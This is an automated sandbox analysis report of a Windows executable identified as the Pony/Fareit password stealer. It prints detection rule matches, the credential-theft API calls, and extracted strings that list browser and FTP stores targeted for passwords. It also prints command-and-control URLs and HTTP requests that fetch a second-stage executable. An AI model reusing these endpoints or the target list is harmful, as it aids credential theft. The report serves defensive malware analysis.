Windows Analysis Report
BW38j8Jkbl.exe

Machine Learning detection for sample

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: BW38j8Jkbl.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	1_2_0040A712
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	1_2_0040D3BE
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,	1_2_0040BC36
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,757283B0,	1_2_0040A557
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	1_2_0040A96D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,	1_2_0040CE3D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,	1_2_0040AB24
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004043DC CryptUnprotectData,LocalFree,	1_2_004043DC

Source: BW38j8Jkbl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408961

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49730 -> 144.76.41.117:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://smartoffice-eg.com/include/rili/gate.php
Source: Malware configuration extractor	URLs: http://smartoffice-eg.com/include/rili/shit.exe

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic	HTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: /Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Source: BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: BW38j8Jkbl.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: smartoffice-eg.com

Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.php
Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: BW38j8Jkbl.exe, 00000001.00000003.1802833837.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smartoffice-eg.com/include/rili/shit.exe
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

System Summary

Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit Payload Author: kevoreilly
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit Payload Author: kevoreilly
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Pony trojan / infostealer detected

Source: Signatures Results

: All Signatures

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004121E9		1_2_004121E9
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00402EFD		1_2_00402EFD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: String function: 00410808 appears 42 times

Source: BW38j8Jkbl.exe, 00000000.00000000.1709686609.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe, 00000001.00000000.1784937920.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
Source: BW38j8Jkbl.exe	Binary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe

Source: BW38j8Jkbl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@1/1

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,

1_2_0040D3BE

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,

1_2_00402968

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

1_2_00402CE7

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File created: C:\Users\user\AppData\Local\Temp\6000093.bat

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "

Source: BW38j8Jkbl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File read: C:\Windows\win.ini

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: BW38j8Jkbl.exe, 00000001.00000003.1791574250.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000003.1791503181.0000000000688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: BW38j8Jkbl.exe

ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "	Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: msi.dll	Jump to behavior
